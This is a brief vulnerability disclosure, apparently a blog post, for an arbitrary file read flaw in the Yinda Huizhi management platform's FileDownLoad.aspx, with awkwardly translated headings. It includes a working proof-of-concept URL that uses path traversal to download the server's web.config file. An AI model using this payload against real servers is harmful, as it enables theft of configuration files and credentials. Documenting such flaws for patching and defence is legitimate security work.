Yinda Huizhi Intelligent Comprehensive Management Platform Filedownload Aspx Any File Reading Vulnerability
Yinda Huizhi Intelligent Comprehensive Management Platform Filedownload Aspx Any File Reading Vulnerability
Yinda Huizhi Intelligent Comprehensive Management Platform FileDownLoad.aspx Any file reading vulnerability
Vulnerability Description
Yinda Huizhi Intelligent Comprehensive Management Platform FileDownLoad.aspx There is a vulnerability to read any file in the server. Through the vulnerability attacker, any file in the server can be downloaded.
Vulnerability Impact
Yinda Huizhi Intelligent Comprehensive Management Platform
Network surveying and mapping
Vulnerability reappears
Login page
Verify POC
https://xxx.xxx.xxx.xxx/Module/FileManagement/FileDownLoad.aspx?filePath=../../web.config
This post is licensed under CC BY 4.0 by the author.